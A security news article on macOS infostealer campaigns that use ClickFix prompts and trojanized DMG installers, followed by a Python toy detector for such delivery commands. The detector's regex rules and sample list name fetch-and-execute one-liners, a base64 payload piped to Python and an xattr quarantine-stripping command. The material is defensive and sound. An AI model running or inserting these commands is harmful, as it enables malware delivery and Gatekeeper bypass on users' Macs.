Infostealer threats have been observed moving beyond traditional Windows-focused campaigns to target macOS environments.

In a Feb. 2 blog post, the Microsoft Defender Security Research Team said these macOS campaigns leverage cross-platform languages such as Python and abuse trusted platforms and utilities to silently deliver credential-stealing malware.

The Microsoft Defender team has observed macOS-targeted infostealer campaigns since late 2025 using a variety of social engineering techniques, including ClickFix-style prompts and malicious DMG installers. These campaigns then deploy macOS-specific infostealers such as DigitStealer, MacSync, and Atomic macOS Stealer, known as AMOS.

Shane Barney, chief information security officer at Keeper Security, said infostealer campaigns like this work because they target the point where most environments are still overconfident: what happens after access gets granted.

Barney said these attackers are not trying to defeat macOS security controls; they deliberately avoid that path by convincing users to install software or run commands that appear legitimate.

“Once that step occurs, the operating system largely fades into the background,” said Barney. “By relying on native tools, scripting languages like Python, and trusted distribution channels, attackers blend into normal activity and minimize detection. The real objective is to quietly collect credentials, session tokens and developer secrets that can be reused later.”

Robert Coles, senior cybersecurity engineer at Black Duck, added that infostealers are evolving into one of the most effective initial access tools used by today’s threat actors. Once considered a Windows-only issue, Coles said, the threat now operates across Windows and macOS, leveraging cross-platform languages such as Python.

“This is not your typical attack, using a software vulnerability,” said Coles. “Instead, the user is persuaded into running a trusted system utility to ‘fix’ something or run a trojanized installer that appears to be a legitimate application.”

Coles pointed out that malvertising, phishing, and fake software updates are typically used to deliver the infostealers. Once a user is convinced to run the compromised application, Coles said, it harvests browser credentials, cookies and session tokens that can be replayed to bypass multi-factor authentication (MFA), financial and cryptocurrency data, and even cloud, developer, and API credentials.

“Using stolen credentials can lead to account takeovers across SaaS and cloud platforms,” said Coles. “Follow-on attacks could also occur, such as ransomware and business email compromise.”
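The delivery pattern the researchers and both experts describe, a user talked into pasting a command into Terminal or stripping quarantine from a downloaded installer so that a shell or Python does the rest, leaves a recognizable shape in shell history and process telemetry. The detector below is an added example written for this page; it is not code from Microsoft's post or from any product named in the article. It runs a handful of rules over constructed sample command lines (the sample commands, the example.invalid URLs and the rule names are all assumptions made for illustration) and flags the ClickFix-style one-liners: remote content piped into an interpreter, a base64-decoded payload piped into an interpreter, an inline Python one-liner that decodes or fetches and executes a payload, and xattr calls that strip the com.apple.quarantine attribute that Gatekeeper's checks are keyed on.

```python
"""Toy detector for ClickFix-style macOS infostealer delivery.

Added example for this page, not code from the Microsoft post. It scores
shell command lines (e.g. from shell history or process telemetry) against
a few rules for the "paste this into Terminal" pattern. The sample commands
below are constructed; example.invalid is a reserved, non-routable domain.
"""
import re
from dataclasses import dataclass

# Reason strings returned by analyze(); the names are this example's own.
REMOTE_EXEC = "remote content piped straight into an interpreter"
DECODED_EXEC = "decoded payload piped into an interpreter"
INLINE_PAYLOAD = "inline Python that decodes or fetches and executes a payload"
QUARANTINE_STRIP = "com.apple.quarantine attribute stripped (Gatekeeper bypass)"

# A pipeline stage that fetches from the network.
FETCH = re.compile(r"^\s*(sudo\s+)?(curl|wget)\b")
# A pipeline stage that decodes an encoded blob (base64 -D is the BSD spelling).
DECODE = re.compile(r"^\s*(base64\s+(-d|-D|--decode)\b|xxd\s+-r\b)")
# A pipeline stage (or leading command) that is an interpreter.
INTERP = re.compile(
    r"^\s*(sudo\s+)?(/bin/|/usr/bin/|/usr/local/bin/)?"
    r"(bash|zsh|sh|python3?|osascript|perl)\b")
# Command substitution that pulls remote content: bash -c "$(curl ...)".
SUBST = re.compile(r"(\$\(|`)\s*(curl|wget)\b")
# xattr removing the quarantine flag by name, or clearing all attributes (-c/-cr).
QUARANTINE = re.compile(r"\bxattr\b.*(-d\s+com\.apple\.quarantine\b|\s-cr?\b)")
# python -c one-liner whose body decodes, fetches or execs something.
INLINE_PY = re.compile(r"\bpython3?\s+-c\b")
SUSPECT_PY = re.compile(r"b64decode|exec\(|urlopen|socket\.")


@dataclass
class Finding:
    cmdline: str
    reasons: list


def analyze(cmdline: str) -> list:
    """Return the rule hits for one shell command line (empty list if clean)."""
    reasons = []
    # Split compound commands on && || ; so each simple pipeline is checked on
    # its own. This is a toy: it does not understand quoting, so the inline
    # Python rule is applied to the whole line further down.
    for cmd in re.split(r"&&|\|\||;", cmdline):
        stages = cmd.split("|")
        for stage, nxt in zip(stages, stages[1:]):
            if FETCH.match(stage) and INTERP.match(nxt):
                reasons.append(REMOTE_EXEC)
            elif DECODE.match(stage) and INTERP.match(nxt):
                reasons.append(DECODED_EXEC)
        if INTERP.match(cmd) and SUBST.search(cmd):
            reasons.append(REMOTE_EXEC)
        if QUARANTINE.search(cmd):
            reasons.append(QUARANTINE_STRIP)
    if INLINE_PY.search(cmdline) and SUSPECT_PY.search(cmdline):
        reasons.append(INLINE_PAYLOAD)
    return list(dict.fromkeys(reasons))  # dedupe, keep first-seen order


def scan(cmdlines) -> list:
    """Run analyze() over many command lines, keeping only those with hits."""
    findings = []
    for line in cmdlines:
        hits = analyze(line)
        if hits:
            findings.append(Finding(line, hits))
    return findings


# Constructed sample input: what a ClickFix lure might ask a user to paste,
# mixed with ordinary developer activity. Not taken from any real incident.
SAMPLE_COMMANDS = [
    "curl -fsSL https://example.invalid/fix.sh | sudo bash",
    "echo aW1wb3J0IG9z | base64 -d | python3",
    "sudo xattr -cr /Applications/TrustedApp.app",
    "python3 -c \"import base64;exec(base64.b64decode('aW1wb3J0IG9z'))\"",
    "ls -la ~/Library/Application\\ Support",
    "python3 manage.py runserver",
    "curl -fsSL https://example.invalid/data.json -o data.json",
]

if __name__ == "__main__":
    for f in scan(SAMPLE_COMMANDS):
        print(f"FLAG {f.cmdline}")
        for r in f.reasons:
            print(f"     - {r}")
```

Treat hits as triage signals rather than blocks: developers legitimately run `curl ... | bash` installers, and a single `xattr -cr` on a freshly built app is routine. In real telemetry the parent process (Terminal or iTerm2 spawned seconds after a browser visit) and the fact that the same line appears on several unrelated hosts are what turn a hit into the social-engineering pattern the article describes.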

Infostealer threats move beyond Windows to target macOS machines

